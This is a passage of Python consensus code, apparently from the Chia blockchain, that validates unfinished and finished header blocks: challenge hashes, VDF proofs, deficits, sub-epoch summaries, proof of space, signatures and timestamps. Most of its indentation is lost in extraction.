skip_overflow_last_ss_validation = False
finished_sub_slots_since_prev = len(header_block.finished_sub_slots)
else:
finished_sub_slots_since_prev = len(header_block.finished_sub_slots) + 1
else:
finished_sub_slots_since_prev = len(header_block.finished_sub_slots)
new_sub_slot: bool = finished_sub_slots_since_prev > 0
can_finish_se: bool = False
can_finish_epoch: bool = False
if genesis_block:
height: uint32 = uint32(0)
assert expected_difficulty == constants.DIFFICULTY_STARTING
assert expected_sub_slot_iters == constants.SUB_SLOT_ITERS_STARTING
else:
assert prev_b is not None
height = uint32(prev_b.height + 1)
if new_sub_slot:
can_finish_se, can_finish_epoch = can_finish_sub_and_full_epoch(
constants,
blocks,
prev_b.height,
prev_b.prev_hash,
prev_b.deficit,
prev_b.sub_epoch_summary_included is not None,
)
else:
can_finish_se = False
can_finish_epoch = False
# 2. Check finished slots that have been crossed since prev_b
ses_hash: Optional[bytes32] = None
if new_sub_slot and not skip_overflow_last_ss_validation:
# Finished a slot(s) since previous block. The first sub-slot must have at least one block, and all
# subsequent sub-slots must be empty
for finished_sub_slot_n, sub_slot in enumerate(header_block.finished_sub_slots):
# Start of slot challenge is fetched from SP
challenge_hash: bytes32 = sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
if finished_sub_slot_n == 0:
if genesis_block:
# 2a. check sub-slot challenge hash for genesis block
if challenge_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
else:
assert prev_b is not None
curr: BlockRecord = prev_b
while not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
assert curr.finished_challenge_slot_hashes is not None
# 2b. check sub-slot challenge hash for non-genesis block
if not curr.finished_challenge_slot_hashes[-1] == challenge_hash:
                        log.error(f"{curr.finished_challenge_slot_hashes[-1]} {challenge_hash}")
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
else:
# 2c. check sub-slot challenge hash for empty slot
if (
not header_block.finished_sub_slots[finished_sub_slot_n - 1].challenge_chain.get_hash()
== challenge_hash
):
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
if genesis_block:
# 2d. Validate that genesis block has no ICC
if sub_slot.infused_challenge_chain is not None:
return None, ValidationError(Err.SHOULD_NOT_HAVE_ICC)
else:
assert prev_b is not None
icc_iters_committed: Optional[uint64] = None
icc_iters_proof: Optional[uint64] = None
icc_challenge_hash: Optional[bytes32] = None
icc_vdf_input = None
if prev_b.deficit < constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
# There should be no ICC chain if the last block's deficit is 16
# Prev sb's deficit is 0, 1, 2, 3, or 4
if finished_sub_slot_n == 0:
# This is the first sub slot after the last sb, which must have deficit 1-4, and thus an ICC
curr = prev_b
while not curr.is_challenge_block(constants) and not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
if curr.is_challenge_block(constants):
icc_challenge_hash = curr.challenge_block_info_hash
icc_iters_committed = uint64(prev_b.sub_slot_iters - curr.ip_iters(constants))
else:
assert curr.finished_infused_challenge_slot_hashes is not None
icc_challenge_hash = curr.finished_infused_challenge_slot_hashes[-1]
icc_iters_committed = prev_b.sub_slot_iters
icc_iters_proof = uint64(prev_b.sub_slot_iters - prev_b.ip_iters(constants))
if prev_b.is_challenge_block(constants):
icc_vdf_input = ClassgroupElement.get_default_element()
else:
icc_vdf_input = prev_b.infused_challenge_vdf_output
else:
# This is not the first sub slot after the last block, so we might not have an ICC
if (
header_block.finished_sub_slots[finished_sub_slot_n - 1].reward_chain.deficit
< constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
):
finished_ss = header_block.finished_sub_slots[finished_sub_slot_n - 1]
assert finished_ss.infused_challenge_chain is not None
                            # Only sets the icc iff the previous sub slot's deficit is 4 or less
icc_challenge_hash = finished_ss.infused_challenge_chain.get_hash()
icc_iters_committed = prev_b.sub_slot_iters
icc_iters_proof = icc_iters_committed
icc_vdf_input = ClassgroupElement.get_default_element()
                # 2e. Validate that there is no icc iff icc_challenge_hash is None
assert (sub_slot.infused_challenge_chain is None) == (icc_challenge_hash is None)
if sub_slot.infused_challenge_chain is not None:
assert icc_vdf_input is not None
assert icc_iters_proof is not None
assert icc_challenge_hash is not None
assert sub_slot.proofs.infused_challenge_chain_slot_proof is not None
# 2f. Check infused challenge chain sub-slot VDF
# Only validate from prev_b to optimize
target_vdf_info = VDFInfo(
icc_challenge_hash,
icc_iters_proof,
sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf.output,
)
if sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf != dataclasses.replace(
target_vdf_info,
number_of_iterations=icc_iters_committed,
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if not skip_vdf_is_valid:
if (
not sub_slot.proofs.infused_challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.infused_challenge_chain_slot_proof.is_valid(
constants, icc_vdf_input, target_vdf_info, None
)
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if (
sub_slot.proofs.infused_challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.infused_challenge_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.infused_challenge_chain.infused_challenge_chain_end_of_slot_vdf,
)
):
return None, ValidationError(Err.INVALID_ICC_EOS_VDF)
if sub_slot.reward_chain.deficit == constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
# 2g. Check infused challenge sub-slot hash in challenge chain, deficit 16
if (
sub_slot.infused_challenge_chain.get_hash()
!= sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash
):
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
else:
# 2h. Check infused challenge sub-slot hash not included for other deficits
if sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
# 2i. Check infused challenge sub-slot hash in reward sub-slot
if (
sub_slot.infused_challenge_chain.get_hash()
!= sub_slot.reward_chain.infused_challenge_chain_sub_slot_hash
):
return None, ValidationError(Err.INVALID_ICC_HASH_RC)
else:
# 2j. If no icc, check that the cc doesn't include it
if sub_slot.challenge_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_CC)
# 2k. If no icc, check that the cc doesn't include it
if sub_slot.reward_chain.infused_challenge_chain_sub_slot_hash is not None:
return None, ValidationError(Err.INVALID_ICC_HASH_RC)
if sub_slot.challenge_chain.subepoch_summary_hash is not None:
assert ses_hash is None # Only one of the slots can have it
ses_hash = sub_slot.challenge_chain.subepoch_summary_hash
# 2l. check sub-epoch summary hash is None for empty slots
if finished_sub_slot_n != 0:
if sub_slot.challenge_chain.subepoch_summary_hash is not None:
return None, ValidationError(Err.INVALID_SUB_EPOCH_SUMMARY_HASH)
if can_finish_epoch and sub_slot.challenge_chain.subepoch_summary_hash is not None:
# 2m. Check new difficulty and ssi
if sub_slot.challenge_chain.new_sub_slot_iters != expected_sub_slot_iters:
return None, ValidationError(Err.INVALID_NEW_SUB_SLOT_ITERS)
if sub_slot.challenge_chain.new_difficulty != expected_difficulty:
return None, ValidationError(Err.INVALID_NEW_DIFFICULTY)
else:
# 2n. Check new difficulty and ssi are None if we don't finish epoch
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
return None, ValidationError(Err.INVALID_NEW_SUB_SLOT_ITERS)
if sub_slot.challenge_chain.new_difficulty is not None:
return None, ValidationError(Err.INVALID_NEW_DIFFICULTY)
# 2o. Check challenge sub-slot hash in reward sub-slot
if sub_slot.challenge_chain.get_hash() != sub_slot.reward_chain.challenge_chain_sub_slot_hash:
return (
None,
ValidationError(
Err.INVALID_CHALLENGE_SLOT_HASH_RC,
"sub-slot hash in reward sub-slot mismatch",
),
)
eos_vdf_iters: uint64 = expected_sub_slot_iters
cc_start_element: ClassgroupElement = ClassgroupElement.get_default_element()
cc_eos_vdf_challenge: bytes32 = challenge_hash
if genesis_block:
if finished_sub_slot_n == 0:
# First block, one empty slot. prior_point is the initial challenge
rc_eos_vdf_challenge: bytes32 = constants.GENESIS_CHALLENGE
cc_eos_vdf_challenge = constants.GENESIS_CHALLENGE
else:
# First block, but have at least two empty slots
rc_eos_vdf_challenge = header_block.finished_sub_slots[
finished_sub_slot_n - 1
].reward_chain.get_hash()
else:
assert prev_b is not None
if finished_sub_slot_n == 0:
# No empty slots, so the starting point of VDF is the last reward block. Uses
# the same IPS as the previous block, since it's the same slot
rc_eos_vdf_challenge = prev_b.reward_infusion_new_challenge
eos_vdf_iters = uint64(prev_b.sub_slot_iters - prev_b.ip_iters(constants))
cc_start_element = prev_b.challenge_vdf_output
else:
# At least one empty slot, so use previous slot hash. IPS might change because it's a new slot
rc_eos_vdf_challenge = header_block.finished_sub_slots[
finished_sub_slot_n - 1
].reward_chain.get_hash()
# 2p. Check end of reward slot VDF
target_vdf_info = VDFInfo(
rc_eos_vdf_challenge,
eos_vdf_iters,
sub_slot.reward_chain.end_of_slot_vdf.output,
)
if not skip_vdf_is_valid and not sub_slot.proofs.reward_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.reward_chain.end_of_slot_vdf,
target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_EOS_VDF)
# 2q. Check challenge chain sub-slot VDF
partial_cc_vdf_info = VDFInfo(
cc_eos_vdf_challenge,
eos_vdf_iters,
sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf.output,
)
if genesis_block:
cc_eos_vdf_info_iters = constants.SUB_SLOT_ITERS_STARTING
else:
assert prev_b is not None
if finished_sub_slot_n == 0:
cc_eos_vdf_info_iters = prev_b.sub_slot_iters
else:
cc_eos_vdf_info_iters = expected_sub_slot_iters
# Check that the modified data is correct
if sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf != dataclasses.replace(
partial_cc_vdf_info,
number_of_iterations=cc_eos_vdf_info_iters,
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF, "wrong challenge chain end of slot vdf")
if not skip_vdf_is_valid:
# Pass in None for target info since we are only checking the proof from the temporary point,
# but the challenge_chain_end_of_slot_vdf actually starts from the start of slot (for light clients)
if (
not sub_slot.proofs.challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.challenge_chain_slot_proof.is_valid(
constants, cc_start_element, partial_cc_vdf_info, None
)
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF)
if (
sub_slot.proofs.challenge_chain_slot_proof.normalized_to_identity
and not sub_slot.proofs.challenge_chain_slot_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_EOS_VDF)
if genesis_block:
# 2r. Check deficit (MIN_SUB.. deficit edge case for genesis block)
if sub_slot.reward_chain.deficit != constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
return (
None,
ValidationError(
Err.INVALID_DEFICIT,
f"genesis, expected deficit {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK}",
),
)
else:
assert prev_b is not None
if prev_b.deficit == 0:
                    # 2s. If prev sb had deficit 0, resets deficit to MIN_BLOCKS_PER_CHALLENGE_BLOCK
if sub_slot.reward_chain.deficit != constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
log.error(
constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK,
)
return (
None,
ValidationError(
Err.INVALID_DEFICIT,
f"expected deficit {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK}, saw "
f"{sub_slot.reward_chain.deficit}",
),
)
else:
# 2t. Otherwise, deficit stays the same at the slot ends, cannot reset until 0
if sub_slot.reward_chain.deficit != prev_b.deficit:
return None, ValidationError(Err.INVALID_DEFICIT, "deficit is wrong at slot end")
# 3. Check sub-epoch summary
# Note that the subepoch summary is the summary of the previous subepoch (not the one that just finished)
if not skip_overflow_last_ss_validation:
if ses_hash is not None:
# 3a. Check that genesis block does not have sub-epoch summary
if genesis_block:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY_HASH,
"genesis with sub-epoch-summary hash",
),
)
assert prev_b is not None
# 3b. Check that we finished a slot and we finished a sub-epoch
if not new_sub_slot or not can_finish_se:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY_HASH,
f"new sub-slot: {new_sub_slot} finishes sub-epoch {can_finish_se}",
),
)
# 3c. Check the actual sub-epoch is correct
if check_sub_epoch_summary:
expected_sub_epoch_summary = make_sub_epoch_summary(
constants,
blocks,
height,
blocks.block_record(prev_b.prev_hash),
expected_difficulty if can_finish_epoch else None,
expected_sub_slot_iters if can_finish_epoch else None,
)
expected_hash = expected_sub_epoch_summary.get_hash()
if expected_hash != ses_hash:
log.error(f"{expected_sub_epoch_summary}")
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY,
f"expected ses hash: {expected_hash} got {ses_hash} ",
),
)
elif new_sub_slot and not genesis_block:
# 3d. Check that we don't have to include a sub-epoch summary
if can_finish_se or can_finish_epoch:
return (
None,
ValidationError(
Err.INVALID_SUB_EPOCH_SUMMARY,
"block finishes sub-epoch but ses-hash is None",
),
)
# 4. Check if the number of blocks is less than the max
if not new_sub_slot and not genesis_block:
assert prev_b is not None
num_blocks = 2 # This includes the current block and the prev block
curr = prev_b
while not curr.first_in_sub_slot:
num_blocks += 1
curr = blocks.block_record(curr.prev_hash)
if num_blocks > constants.MAX_SUB_SLOT_BLOCKS:
return None, ValidationError(Err.TOO_MANY_BLOCKS)
# If block state is correct, we should always find a challenge here
# This computes what the challenge should be for this block
challenge = get_block_challenge(
constants,
header_block,
blocks,
genesis_block,
overflow,
skip_overflow_last_ss_validation,
)
# 5a. Check proof of space
if challenge != header_block.reward_chain_block.pos_ss_cc_challenge_hash:
log.error(f"Finished slots: {header_block.finished_sub_slots}")
log.error(
f"Data: {genesis_block} {overflow} {skip_overflow_last_ss_validation} {header_block.total_iters} "
f"{header_block.reward_chain_block.signage_point_index}"
f"Prev: {prev_b}"
)
log.error(f"Challenge {challenge} provided {header_block.reward_chain_block.pos_ss_cc_challenge_hash}")
return None, ValidationError(Err.INVALID_CC_CHALLENGE)
# 5b. Check proof of space
if header_block.reward_chain_block.challenge_chain_sp_vdf is None:
# Edge case of first sp (start of slot), where sp_iters == 0
cc_sp_hash: bytes32 = challenge
else:
cc_sp_hash = header_block.reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
q_str: Optional[bytes32] = header_block.reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants, challenge, cc_sp_hash
)
if q_str is None:
return None, ValidationError(Err.INVALID_POSPACE)
# 6. check signage point index
# no need to check negative values as this is uint 8
if header_block.reward_chain_block.signage_point_index >= constants.NUM_SPS_SUB_SLOT:
return None, ValidationError(Err.INVALID_SP_INDEX)
# Note that required iters might be from the previous slot (if we are in an overflow block)
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
q_str,
header_block.reward_chain_block.proof_of_space.size,
expected_difficulty,
cc_sp_hash,
)
# 7. check required iters
if required_iters >= calculate_sp_interval_iters(constants, expected_sub_slot_iters):
return None, ValidationError(Err.INVALID_REQUIRED_ITERS)
# 8a. check signage point index 0 has no cc sp
if (header_block.reward_chain_block.signage_point_index == 0) != (
header_block.reward_chain_block.challenge_chain_sp_vdf is None
):
return None, ValidationError(Err.INVALID_SP_INDEX)
# 8b. check signage point index 0 has no rc sp
if (header_block.reward_chain_block.signage_point_index == 0) != (
header_block.reward_chain_block.reward_chain_sp_vdf is None
):
return None, ValidationError(Err.INVALID_SP_INDEX)
sp_iters: uint64 = calculate_sp_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
)
ip_iters: uint64 = calculate_ip_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
required_iters,
)
if header_block.reward_chain_block.challenge_chain_sp_vdf is None:
# Blocks with very low required iters are not overflow blocks
assert not overflow
# 9. Check no overflows in the first sub-slot of a new epoch
# (although they are OK in the second sub-slot), this is important
if overflow and can_finish_epoch:
if finished_sub_slots_since_prev < 2:
return None, ValidationError(Err.NO_OVERFLOWS_IN_FIRST_SUB_SLOT_NEW_EPOCH)
# 10. Check total iters
if genesis_block:
total_iters: uint128 = uint128(expected_sub_slot_iters * finished_sub_slots_since_prev)
else:
assert prev_b is not None
if new_sub_slot:
total_iters = prev_b.total_iters
# Add the rest of the slot of prev_b
total_iters = uint128(total_iters + prev_b.sub_slot_iters - prev_b.ip_iters(constants))
# Add other empty slots
total_iters = uint128(total_iters + (expected_sub_slot_iters * (finished_sub_slots_since_prev - 1)))
else:
# Slot iters is guaranteed to be the same for header_block and prev_b
# This takes the beginning of the slot, and adds ip_iters
total_iters = uint128(prev_b.total_iters - prev_b.ip_iters(constants))
total_iters = uint128(total_iters + ip_iters)
if total_iters != header_block.reward_chain_block.total_iters:
return (
None,
ValidationError(
Err.INVALID_TOTAL_ITERS,
f"expected {total_iters} got {header_block.reward_chain_block.total_iters}",
),
)
sp_total_iters: uint128 = uint128(total_iters - ip_iters + sp_iters - (expected_sub_slot_iters if overflow else 0))
if overflow and skip_overflow_last_ss_validation:
dummy_vdf_info = VDFInfo(
bytes32([0] * 32),
uint64(1),
ClassgroupElement.get_default_element(),
)
dummy_sub_slot = EndOfSubSlotBundle(
ChallengeChainSubSlot(dummy_vdf_info, None, None, None, None),
None,
RewardChainSubSlot(dummy_vdf_info, bytes32([0] * 32), None, uint8(0)),
SubSlotProofs(VDFProof(uint8(0), b"", False), None, VDFProof(uint8(0), b"", False)),
)
sub_slots_to_pass_in = header_block.finished_sub_slots + [dummy_sub_slot]
else:
sub_slots_to_pass_in = header_block.finished_sub_slots
(
cc_vdf_challenge,
rc_vdf_challenge,
cc_vdf_input,
rc_vdf_input,
cc_vdf_iters,
rc_vdf_iters,
) = get_signage_point_vdf_info(
constants,
sub_slots_to_pass_in,
overflow,
prev_b,
blocks,
sp_total_iters,
sp_iters,
)
# 11. Check reward chain sp proof
if sp_iters != 0:
assert (
header_block.reward_chain_block.reward_chain_sp_vdf is not None
and header_block.reward_chain_sp_proof is not None
)
target_vdf_info = VDFInfo(
rc_vdf_challenge,
rc_vdf_iters,
header_block.reward_chain_block.reward_chain_sp_vdf.output,
)
if not skip_vdf_is_valid and not header_block.reward_chain_sp_proof.is_valid(
constants,
rc_vdf_input,
header_block.reward_chain_block.reward_chain_sp_vdf,
target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_SP_VDF)
rc_sp_hash = header_block.reward_chain_block.reward_chain_sp_vdf.output.get_hash()
else:
# Edge case of first sp (start of slot), where sp_iters == 0
assert overflow is not None
if header_block.reward_chain_block.reward_chain_sp_vdf is not None:
return None, ValidationError(Err.INVALID_RC_SP_VDF)
if new_sub_slot:
rc_sp_hash = header_block.finished_sub_slots[-1].reward_chain.get_hash()
else:
if genesis_block:
rc_sp_hash = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
curr = prev_b
while not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
assert curr.finished_reward_slot_hashes is not None
rc_sp_hash = curr.finished_reward_slot_hashes[-1]
# 12. Check reward chain sp signature
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
rc_sp_hash,
header_block.reward_chain_block.reward_chain_sp_signature,
):
return None, ValidationError(Err.INVALID_RC_SIGNATURE)
# 13. Check cc sp vdf
if sp_iters != 0:
assert header_block.reward_chain_block.challenge_chain_sp_vdf is not None
assert header_block.challenge_chain_sp_proof is not None
target_vdf_info = VDFInfo(
cc_vdf_challenge,
cc_vdf_iters,
header_block.reward_chain_block.challenge_chain_sp_vdf.output,
)
if header_block.reward_chain_block.challenge_chain_sp_vdf != dataclasses.replace(
target_vdf_info,
number_of_iterations=sp_iters,
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
if not skip_vdf_is_valid:
if (
not header_block.challenge_chain_sp_proof.normalized_to_identity
and not header_block.challenge_chain_sp_proof.is_valid(constants, cc_vdf_input, target_vdf_info, None)
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
if (
header_block.challenge_chain_sp_proof.normalized_to_identity
and not header_block.challenge_chain_sp_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.challenge_chain_sp_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_SP_VDF)
else:
assert overflow is not None
if header_block.reward_chain_block.challenge_chain_sp_vdf is not None:
return None, ValidationError(Err.INVALID_CC_SP_VDF)
# 14. Check cc sp sig
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
cc_sp_hash,
header_block.reward_chain_block.challenge_chain_sp_signature,
):
return None, ValidationError(Err.INVALID_CC_SIGNATURE, "invalid cc sp sig")
# 15. Check is_transaction_block
if genesis_block:
if header_block.foliage.foliage_transaction_block_hash is None:
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK, "invalid genesis")
else:
assert prev_b is not None
# Finds the previous block
curr = prev_b
while not curr.is_transaction_block:
curr = blocks.block_record(curr.prev_hash)
# The first block to have an sp > the last tx block's infusion iters, is a tx block
if overflow:
our_sp_total_iters: uint128 = uint128(total_iters - ip_iters + sp_iters - expected_sub_slot_iters)
else:
our_sp_total_iters = uint128(total_iters - ip_iters + sp_iters)
if (our_sp_total_iters > curr.total_iters) != (header_block.foliage.foliage_transaction_block_hash is not None):
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK)
if (our_sp_total_iters > curr.total_iters) != (
header_block.foliage.foliage_transaction_block_signature is not None
):
return None, ValidationError(Err.INVALID_IS_TRANSACTION_BLOCK)
# 16. Check foliage block signature by plot key
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
header_block.foliage.foliage_block_data.get_hash(),
header_block.foliage.foliage_block_data_signature,
):
return None, ValidationError(Err.INVALID_PLOT_SIGNATURE)
# 17. Check foliage block signature by plot key
if header_block.foliage.foliage_transaction_block_hash is not None:
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.plot_public_key,
header_block.foliage.foliage_transaction_block_hash,
header_block.foliage.foliage_transaction_block_signature,
):
return None, ValidationError(Err.INVALID_PLOT_SIGNATURE)
# 18. Check unfinished reward chain block hash
if (
header_block.reward_chain_block.get_hash()
!= header_block.foliage.foliage_block_data.unfinished_reward_block_hash
):
return None, ValidationError(Err.INVALID_URSB_HASH)
# 19. Check pool target max height
if (
header_block.foliage.foliage_block_data.pool_target.max_height != 0
and header_block.foliage.foliage_block_data.pool_target.max_height < height
):
return None, ValidationError(Err.OLD_POOL_TARGET)
# 20a. Check pre-farm puzzle hashes for genesis block.
if genesis_block:
if (
header_block.foliage.foliage_block_data.pool_target.puzzle_hash
!= constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH
):
log.error(f"Pool target {header_block.foliage.foliage_block_data.pool_target} hb {header_block}")
return None, ValidationError(Err.INVALID_PREFARM)
if (
header_block.foliage.foliage_block_data.farmer_reward_puzzle_hash
!= constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
):
return None, ValidationError(Err.INVALID_PREFARM)
else:
        # 20b. If pospace has a pool pk, check pool target signature. Should not check this for genesis block.
if header_block.reward_chain_block.proof_of_space.pool_public_key is not None:
assert header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash is None
if not AugSchemeMPL.verify(
header_block.reward_chain_block.proof_of_space.pool_public_key,
bytes(header_block.foliage.foliage_block_data.pool_target),
header_block.foliage.foliage_block_data.pool_signature,
):
return None, ValidationError(Err.INVALID_POOL_SIGNATURE)
else:
# 20c. Otherwise, the plot is associated with a contract puzzle hash, not a public key
assert header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash is not None
if (
header_block.foliage.foliage_block_data.pool_target.puzzle_hash
!= header_block.reward_chain_block.proof_of_space.pool_contract_puzzle_hash
):
return None, ValidationError(Err.INVALID_POOL_TARGET)
# 21. Check extension data if applicable. None for mainnet.
# 22. Check if foliage block is present
if (header_block.foliage.foliage_transaction_block_hash is not None) != (
header_block.foliage_transaction_block is not None
):
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
if (header_block.foliage.foliage_transaction_block_signature is not None) != (
header_block.foliage_transaction_block is not None
):
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
if header_block.foliage_transaction_block is not None:
# 23. Check foliage block hash
if header_block.foliage_transaction_block.get_hash() != header_block.foliage.foliage_transaction_block_hash:
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_HASH)
if genesis_block:
# 24a. Check prev block hash for genesis
if header_block.foliage_transaction_block.prev_transaction_block_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
else:
assert prev_b is not None
# 24b. Check prev block hash for non-genesis
curr_b: BlockRecord = prev_b
while not curr_b.is_transaction_block:
curr_b = blocks.block_record(curr_b.prev_hash)
if not header_block.foliage_transaction_block.prev_transaction_block_hash == curr_b.header_hash:
log.error(
f"Prev BH: {header_block.foliage_transaction_block.prev_transaction_block_hash} "
f"{curr_b.header_hash} curr sb: {curr_b}"
)
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
# 25. The filter hash in the Foliage Block must be the hash of the filter
if check_filter:
if header_block.foliage_transaction_block.filter_hash != std_hash(header_block.transactions_filter):
return None, ValidationError(Err.INVALID_TRANSACTIONS_FILTER_HASH)
# 26a. The timestamp in Foliage Block must not be over 5 minutes in the future
if header_block.foliage_transaction_block.timestamp > int(time.time() + constants.MAX_FUTURE_TIME):
return None, ValidationError(Err.TIMESTAMP_TOO_FAR_IN_FUTURE)
if prev_b is not None:
# 26b. The timestamp must be greater than the previous transaction block timestamp
prev_transaction_b = blocks.block_record(header_block.foliage_transaction_block.prev_transaction_block_hash)
assert prev_transaction_b.timestamp is not None
if header_block.foliage_transaction_block.timestamp <= prev_transaction_b.timestamp:
return None, ValidationError(Err.TIMESTAMP_TOO_FAR_IN_PAST)
return required_iters, None # Valid unfinished header block
def validate_finished_header_block(
constants: ConsensusConstants,
blocks: BlockchainInterface,
header_block: HeaderBlock,
check_filter: bool,
expected_difficulty: uint64,
expected_sub_slot_iters: uint64,
check_sub_epoch_summary=True,
) -> Tuple[Optional[uint64], Optional[ValidationError]]:
"""
Fully validates the header of a block. A header block is the same as a full block, but
without transactions and transaction info. Returns (required_iters, error).
"""
unfinished_header_block = UnfinishedHeaderBlock(
header_block.finished_sub_slots,
header_block.reward_chain_block.get_unfinished(),
header_block.challenge_chain_sp_proof,
header_block.reward_chain_sp_proof,
header_block.foliage,
header_block.foliage_transaction_block,
header_block.transactions_filter,
)
required_iters, validate_unfinished_err = validate_unfinished_header_block(
constants,
blocks,
unfinished_header_block,
check_filter,
expected_difficulty,
expected_sub_slot_iters,
False,
check_sub_epoch_summary=check_sub_epoch_summary,
)
genesis_block = False
if validate_unfinished_err is not None:
return None, validate_unfinished_err
assert required_iters is not None
if header_block.height == 0:
prev_b: Optional[BlockRecord] = None
genesis_block = True
else:
prev_b = blocks.block_record(header_block.prev_header_hash)
new_sub_slot: bool = len(header_block.finished_sub_slots) > 0
ip_iters: uint64 = calculate_ip_iters(
constants,
expected_sub_slot_iters,
header_block.reward_chain_block.signage_point_index,
required_iters,
)
if not genesis_block:
assert prev_b is not None
# 27. Check block height
if header_block.height != prev_b.height + 1:
return None, ValidationError(Err.INVALID_HEIGHT)
# 28. Check weight
if header_block.weight != prev_b.weight + expected_difficulty:
log.error(f"INVALID WEIGHT: {header_block} {prev_b} {expected_difficulty}")
return None, ValidationError(Err.INVALID_WEIGHT)
else:
# 27b. Check genesis block height, weight, and prev block hash
if header_block.height != uint32(0):
return None, ValidationError(Err.INVALID_HEIGHT)
if header_block.weight != constants.DIFFICULTY_STARTING:
return None, ValidationError(Err.INVALID_WEIGHT)
if header_block.prev_header_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
# RC vdf challenge is taken from more recent of (slot start, prev_block)
if genesis_block:
cc_vdf_output = ClassgroupElement.get_default_element()
ip_vdf_iters = ip_iters
if new_sub_slot:
rc_vdf_challenge = header_block.finished_sub_slots[-1].reward_chain.get_hash()
else:
rc_vdf_challenge = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
if new_sub_slot:
# slot start is more recent
rc_vdf_challenge = header_block.finished_sub_slots[-1].reward_chain.get_hash()
ip_vdf_iters = ip_iters
cc_vdf_output = ClassgroupElement.get_default_element()
else:
# Prev sb is more recent
rc_vdf_challenge = prev_b.reward_infusion_new_challenge
ip_vdf_iters = uint64(header_block.reward_chain_block.total_iters - prev_b.total_iters)
cc_vdf_output = prev_b.challenge_vdf_output
# 29. Check challenge chain infusion point VDF
if new_sub_slot:
cc_vdf_challenge = header_block.finished_sub_slots[-1].challenge_chain.get_hash()
else:
# Not first block in slot
if genesis_block:
# genesis block
cc_vdf_challenge = constants.GENESIS_CHALLENGE
else:
assert prev_b is not None
# Not genesis block, go back to first block in slot
curr = prev_b
while curr.finished_challenge_slot_hashes is None:
curr = blocks.block_record(curr.prev_hash)
cc_vdf_challenge = curr.finished_challenge_slot_hashes[-1]
cc_target_vdf_info = VDFInfo(
cc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.challenge_chain_ip_vdf.output,
)
if header_block.reward_chain_block.challenge_chain_ip_vdf != dataclasses.replace(
cc_target_vdf_info,
number_of_iterations=ip_iters,
):
expected = dataclasses.replace(
cc_target_vdf_info,
number_of_iterations=ip_iters,
)
